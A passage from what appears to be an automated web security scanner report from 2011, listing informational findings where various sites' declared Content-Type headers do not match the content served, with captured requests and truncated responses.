X-Req-Start: t=1305201729586860
X-Req-Proc: D=286
Connection: close
X-Pad: avoid browser bug

function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Dallas'; }
function geoip_region() { return 'TX';
...[SNIP]...

28.16. http://kona40.kontera.com/KonaGet.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://kona40.kontera.com
Path:	/KonaGet.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /KonaGet.js?u=1305200280719&p=134803&k=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/jpNNP3&al=1&l=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&t=Ted+Forstmann+Being+Treated+for+Brain+Cancer+-+FoxBusiness.com&m1=recession+%2C+Henry+Kravis+%2C+RJR+Nabisco+%2C+junk+bonds+%2C+Padma+Lakshmi+%2C+FOX+Business+Network+%2C+private+equity+%2C+FOX+&rId=0&prev_page=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&rl=0&1=14&mod=536936450&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona40.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=1989E06E-70CA-11E0-8B1B-AA0011BCA051; cluid=-12035860971305125961969; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1504

konaSafe(function(){
reJsonResponse({"AutoReport":{},"konaLat":"32.7825012","konaLon":"-96.8207016","konaPostalCode":"75207","publisherParams":{"all_except":"1","infoUnit.dc_open_new_win":"yes","tags_
...[SNIP]...

28.17. http://labs.csscorp.com/site/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://labs.csscorp.com
Path:	/site/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /site/favicon.ico HTTP/1.1
Host: labs.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU; __utma=198546482.1077941423.1305205936.1305205936.1305205936.1; __utmb=198546482.1.10.1305205936; __utmc=198546482; __utmz=198546482.1305205936.1.1.utmcsr=csscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:16 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 06:48:35 GMT
ETag: "3cb4af-47e-4a209101416c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

28.18. http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://markets.on.nytimes.com
Path:	/research/modules/dealbook_2010/dealbook.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.19. http://pillsburylaw.app4.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pillsburylaw.app4.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.20. http://rapidssl-aia.geotrust.com/rapidssl.crt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rapidssl-aia.geotrust.com
Path:	/rapidssl.crt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /rapidssl.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Proxy-Connection: Keep-Alive
Host: rapidssl-aia.geotrust.com

Response

HTTP/1.0 200 OK
Age: 1192
Date: Thu, 12 May 2011 10:53:50 GMT
Connection: Keep-Alive
Via: NS-248
ETag: "2ac0d8-3d9-f8397ac0"
Server: Apache/2.2.2 (Unix)
Last-Modified: Wed, 21 Jul 2010 18:28:35 GMT
Accept-Ranges: bytes
Content-Length: 985
Content-Type: text/plain
X-Cache: MISS from hostname

0...0...........6.0. *.H.......0B1.0 ..U....US1.0...U.
.GeoTrust Inc.1.0...U....GeoTrust Global CA0..100219224505Z.200218224505Z0<1.0 ..U....US1.0...U.
..GeoTrust, Inc.1.0...U....RapidSSL CA0.."0
...[SNIP]...

28.21. https://services.sungarddx.com/admin/GetExternMedia.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/admin/GetExternMedia.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

28.22. https://services.sungarddx.com/common/js/AdminFunctions.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://services.sungarddx.com
Path:	/common/js/AdminFunctions.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.23. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://topics.nytimes.com
Path:	/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

28.24. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://topics.nytimes.com
Path:	/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

28.25. http://topics.nytimes.com/svc/timespeople/bell.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://topics.nytimes.com
Path:	/svc/timespeople/bell.html

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

28.26. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

28.27. http://trc.taboolasyndication.com/bloomberg/trc/2/json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/bloomberg/trc/2/json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

Response

28.28. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

28.29. http://webezines.kwithost.com/sx25Feed.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://webezines.kwithost.com
Path:	/sx25Feed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sx25Feed.php?action=twitter_news&showtype=31&keyword=Investment%20Firms&format=json&callback=jsonp1305198220593&_=1305198220618 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 3551
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220593([{"id":"1","image":"http:\/\/a1.twimg.com\/profile_images\/1169203534\/fc4af617-eadc-4bda-9fe3-f5f7155c45e5_normal.png","content":"\n\t <a href=\"http:\/\/twitter.com\/Cornis
...[SNIP]...

28.30. http://wolfgreenfield.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://wolfgreenfield.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.31. https://ww3.janus.com/advisor/images/st_facebook_footer.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/images/st_facebook_footer.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_facebook_footer.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"794-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 794
Date: Thu, 12 May 2011 11:24:16 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . .............................................................
...[SNIP]...

28.32. https://ww3.janus.com/advisor/images/st_facebook_header.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/images/st_facebook_header.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_facebook_header.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"825-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 825
Date: Thu, 12 May 2011 11:24:17 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

28.33. https://ww3.janus.com/advisor/images/st_twitter_footer.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/images/st_twitter_footer.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_twitter_footer.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"884-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 884
Date: Thu, 12 May 2011 11:24:16 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . .............................................................
...[SNIP]...

28.34. https://ww3.janus.com/advisor/images/st_twitter_header.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://ww3.janus.com
Path:	/advisor/images/st_twitter_header.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_twitter_header.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"859-1304985196443"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 859
Date: Thu, 12 May 2011 11:24:18 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

28.35. http://www.beneschlaw.com/files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.beneschlaw.com
Path:	/files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /files/ImageControl/be5e9886-616f-4c6d-972a-05c597caa379/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/go%20green%20(2).gif HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.beneschlaw.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1115; PortletId=6201; SiteId=1086; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=4pdcdw555vegmp55inbs05nz; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; ZoneId=7; NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Content-Length: 8118
Content-Type: image/gif
Last-Modified: Thu, 18 Dec 2008 20:31:02 GMT
Accept-Ranges: bytes
ETag: "087d8b4f61c91:1c5e"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A74
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:19:18 GMT

BM........6...(...U...P................................F..KKK.........je'......'..222..6..;<<.................+o...]*.........+++..y,.gw).................*l.."H.&b.........."""......d+..L......#[....
...[SNIP]...

28.36. http://www.butlerrubin.com/web/br.nsf/br_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/br_logo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /web/br.nsf/br_logo.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:26 GMT
Last-Modified: Tue, 10 May 2011 07:00:52 GMT
Content-Type: image/gif
Content-Length: 13722
ETag: W/"MTAtODA4Ny04NjI1Nzg1RTAwN0UzMjVDLTg2MjU3N0I0MDA2MTk2REQtRjVDREVCMjY3RkM0QTc0Njg1MjU3MDY3MDA2QjAzN0U="

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................P....
...[SNIP]...

28.37. http://www.butlerrubin.com/web/br.nsf/tableback.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/tableback.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /web/br.nsf/tableback.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Last-Modified: Tue, 10 May 2011 07:00:52 GMT
Content-Type: image/gif
Content-Length: 39928
ETag: W/"MTAtODA4Ny04NjI1Nzg1RTAwN0UzMjVDLTg2MjU3N0I0MDA2MTk1RkYtQkU1NkQzNDQ0OUJEMUZENjg1MjU3MDc2MDA1NkI0OEM="

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

28.38. http://www.conferenceservers.com/browser/proxy.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.conferenceservers.com
Path:	/browser/proxy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.39. http://www.digiware.net/templates/home/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.digiware.net
Path:	/templates/home/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/home/favicon.ico HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Jun 2009 19:06:08 GMT
ETag: "28f8871-47e-46b9e95bc6800"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................/.................................................../......./.........................................................../

.

..

...[SNIP]...

28.40. http://www.digiware.net/templates/intena1/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.digiware.net
Path:	/templates/intena1/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/intena1/favicon.ico HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Jun 2009 19:06:50 GMT
ETag: "28f893f-47e-46b9e983d4680"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................/.................................................../......./.........................................................../

.

..

...[SNIP]...

28.41. http://www.dmoc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.dmoc.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=58296304a4b8ec99476daf96829e277a; has_js=1; __utma=101869332.609237140.1305202772.1305202772.1305202772.1; __utmb=101869332.1.10.1305202772; __utmc=101869332; __utmz=101869332.1305202772.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Diserio%20Martin%20O%27Connor%20%26%20Castiglioni

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:19:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

28.42. http://www.elawmarketing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.elawmarketing.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS12e590b5abdc44fd41146e46388173a1=eb9d5d4ea1e9477d833990655e7604b8; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:00:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

28.43. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.145.124
X-Cnection: close
Date: Thu, 12 May 2011 11:37:23 GMT
Content-Length: 17

Application Error

28.44. http://www.foxbusiness.com/authentication/logout/submit previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxbusiness.com
Path:	/authentication/logout/submit

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /authentication/logout/submit HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
